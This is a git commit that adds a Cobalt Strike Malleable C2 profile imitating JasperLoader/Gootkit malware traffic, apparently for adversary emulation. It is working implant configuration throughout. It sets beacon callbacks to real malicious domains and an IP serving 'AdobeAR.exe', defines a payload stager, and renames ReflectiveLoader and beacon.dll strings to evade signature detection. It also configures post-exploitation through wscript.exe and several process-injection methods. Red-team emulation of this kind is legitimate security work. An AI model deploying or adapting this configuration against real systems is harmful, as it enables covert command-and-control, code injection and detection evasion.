Create jasperloader.profile
xx0hcd
GitHub
parent
6dfce7d8b0
commit
56ddb7a407
|
|
@ -0,0 +1,223 @@
|
|||
#jasperloader.profile
|
||||
#https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html
|
||||
#https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
|
||||
#xx0hcd
|
||||
|
||||
###global options###
|
||||
#sleeptime from report, image 'Figure 22: Stage 2 — JavaScript retrieval'
|
||||
set sleeptime "180000";
|
||||
set jitter "33";
|
||||
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
|
||||
|
||||
set sample_name "jasperloader.profile";
|
||||
|
||||
http-get {
|
||||
|
||||
set uri "/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php";
|
||||
|
||||
set verb "GET";
|
||||
|
||||
client {
|
||||
|
||||
header "Host" "cdn.zaczvk.pl";
|
||||
header "Connection" "Keep-Alive";
|
||||
|
||||
|
||||
metadata {
|
||||
base64url;
|
||||
parameter "vid";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
server {
|
||||
header "Server" "nginx/1.14.2";
|
||||
header "Content-Type" "text/html; charset=UTF-8";
|
||||
header "Connection" "keep-alive";
|
||||
header "X-Powered-By" "PHP/5.4.16";
|
||||
|
||||
output {
|
||||
|
||||
netbios;
|
||||
|
||||
prepend "\nfiuyc= \"";
|
||||
|
||||
append "\";\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv = new Array();\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"i95BtfTT\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"C(\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"wVC3Ea\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"93V6x46z\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"9E7txtA6tRS3>SzSt4w\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"Bv9\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"xta7\")\n";
|
||||
append "xfbjixjsytvxjyuvcaxhfehv.push(\"49\")\n";
|
||||
|
||||
print;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
http-post {
|
||||
|
||||
set uri "/";
|
||||
set verb "GET";
|
||||
#set verb "POST";
|
||||
|
||||
client {
|
||||
|
||||
|
||||
header "Host" "space.bajamelide.ch";
|
||||
header "Connection" "Keep-Alive";
|
||||
|
||||
output {
|
||||
base64url;
|
||||
parameter "b";
|
||||
}
|
||||
|
||||
id {
|
||||
base64url;
|
||||
parameter "v";
|
||||
|
||||
}
|
||||
parameter "psver" "5";
|
||||
}
|
||||
|
||||
server {
|
||||
header "Server" "nginx/1.14.2";
|
||||
header "Content-Type" "text/html; charset=UTF-8";
|
||||
header "Content-Length" "89";
|
||||
header "Connection" "keep-alive";
|
||||
header "X-Powered-By" "PHP/5.4.16";
|
||||
|
||||
output {
|
||||
netbios;
|
||||
|
||||
# prepend "\n";
|
||||
prepend "d|http://31.214.157.69/";
|
||||
|
||||
append "|AdobeAR.exe|http://cdn.zaczvk.pl/moddownloadok.php";
|
||||
print;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
http-stager {
|
||||
|
||||
set uri_x86 "/501";
|
||||
set uri_x64 "/502";
|
||||
|
||||
client {
|
||||
header "Host" "cloud.diminishedvaluecalifornia.com";
|
||||
header "Connection" "Keep-Alive";
|
||||
|
||||
parameter "dwgvhgc" "";
|
||||
}
|
||||
|
||||
server {
|
||||
header "Server" "Apache/2.2.15 (CentOS)";
|
||||
header "Last-Modified" "Tue, 22 Jan 2019 16:31:28 GMT";
|
||||
header "ETag" "9f688-4-5800e82560818";
|
||||
header "Accept-Ranges" "bytes";
|
||||
header "Content-Length" "4";
|
||||
header "Connection" "close";
|
||||
header "Content-Type" "text/html; charset=UTF-8";
|
||||
|
||||
output{
|
||||
prepend "500\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
|
||||
print;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
###Malleable PE Options###
|
||||
|
||||
post-ex {
|
||||
|
||||
set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
|
||||
set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
|
||||
|
||||
set obfuscate "false";
|
||||
|
||||
set smartinject "false";
|
||||
|
||||
set amsi_disable "false";
|
||||
|
||||
}
|
||||
|
||||
#used peclone on sample from 2nd stage gootkit using same domains, https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
|
||||
stage {
|
||||
set checksum "0";
|
||||
set compile_time "15 Apr 2015 01:24:00";
|
||||
set entry_point "8208";
|
||||
set image_size_x86 "2560000";
|
||||
set image_size_x64 "2560000";
|
||||
#set name "";
|
||||
set userwx "false";
|
||||
set cleanup "false";
|
||||
set sleep_mask "false";
|
||||
set stomppe "false";
|
||||
set obfuscate "false";
|
||||
set rich_header "";
|
||||
|
||||
set sleep_mask "false";
|
||||
|
||||
# set module_x86 "";
|
||||
# set module_x64 "";
|
||||
|
||||
transform-x86 {
|
||||
prepend "\x90\x90\x90";
|
||||
strrep "ReflectiveLoader" "6ayBRVW";
|
||||
strrep "beacon.dll" "uVRWRut";
|
||||
}
|
||||
|
||||
transform-x64 {
|
||||
prepend "\x90\x90\x90";
|
||||
strrep "ReflectiveLoader" "6ayBRVW";
|
||||
strrep "beacon.x64.dll" "uVRWRut";
|
||||
}
|
||||
|
||||
#can set a string in the .rdata section of the beacon dll.
|
||||
#adds a zero-terminated string
|
||||
#string "something";
|
||||
|
||||
#adds a string 'as-is'
|
||||
#data "something";
|
||||
|
||||
#adds a wide (UTF-16LE encoded) string
|
||||
stringw "IMAGE_SCN_MEM_READ";
|
||||
}
|
||||
|
||||
|
||||
#controls process injection behavior
|
||||
process-inject {
|
||||
|
||||
set allocator "NtMapViewOfSection";
|
||||
|
||||
set min_alloc "16700";
|
||||
|
||||
set userwx "false";
|
||||
|
||||
set startrwx "true";
|
||||
|
||||
transform-x86 {
|
||||
prepend "\x90\x90\x90";
|
||||
}
|
||||
transform-x64 {
|
||||
prepend "\x90\x90\x90";
|
||||
}
|
||||
|
||||
execute {
|
||||
CreateThread "ntdll!RtlUserThreadStart";
|
||||
CreateThread;
|
||||
NtQueueApcThread;
|
||||
CreateRemoteThread;
|
||||
RtlCreateUserThread;
|
||||
}
|
||||
}
|
||||
Loading…
Reference in New Issue